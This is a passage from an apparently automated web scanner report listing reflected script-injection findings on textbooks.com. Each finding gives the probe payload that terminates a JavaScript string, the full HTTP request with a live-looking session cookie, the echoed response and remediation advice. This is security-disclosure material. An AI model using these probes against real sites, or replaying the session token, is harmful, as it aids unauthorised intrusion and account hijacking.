Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:51 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/S/76e55';5cea322eca4'

</script>
...[SNIP]...

1.34. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c3ed'%3b788bb26a33c was submitted in the REST URL parameter 1. This input was echoed as 4c3ed';788bb26a33c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog4c3ed'%3b788bb26a33c/T/Architecture-Engineering-Manufacture-and-Transport.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3680
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog4c3ed';788bb26a33c/T/Architecture-Engineering-Manufacture-and-Transport.php'

</script>
...[SNIP]...

1.35. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9590f'%3bfaf8f291a5e was submitted in the REST URL parameter 3. This input was echoed as 9590f';faf8f291a5e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/T/9590f'%3bfaf8f291a5e HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/T/9590f';faf8f291a5e'

</script>
...[SNIP]...

1.36. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/V/Vocational-and-Professional-Education.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef83c'%3b5c003b17b5 was submitted in the REST URL parameter 1. This input was echoed as ef83c';5c003b17b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalogef83c'%3b5c003b17b5/V/Vocational-and-Professional-Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3666
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:46 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalogef83c';5c003b17b5/V/Vocational-and-Professional-Education.php'

</script>
...[SNIP]...

1.37. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/V/Vocational-and-Professional-Education.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f234'%3ba0f0a99fb19 was submitted in the REST URL parameter 3. This input was echoed as 3f234';a0f0a99fb19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/V/3f234'%3ba0f0a99fb19 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:47 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/V/3f234';a0f0a99fb19'

</script>
...[SNIP]...

1.38. http://www.textbooks.com/CustServ-Contact.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-Contact.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3be2e'%3b1c6a9d6e709 was submitted in the REST URL parameter 1. This input was echoed as 3be2e';1c6a9d6e709 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-Contact.php3be2e'%3b1c6a9d6e709 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3636
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:23 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-Contact.php3be2e';1c6a9d6e709'

</script>
...[SNIP]...

1.39. http://www.textbooks.com/CustServ-FAQ.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-FAQ.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50160'%3bc1fcfb98d9a was submitted in the REST URL parameter 1. This input was echoed as 50160';c1fcfb98d9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-FAQ.php50160'%3bc1fcfb98d9a HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
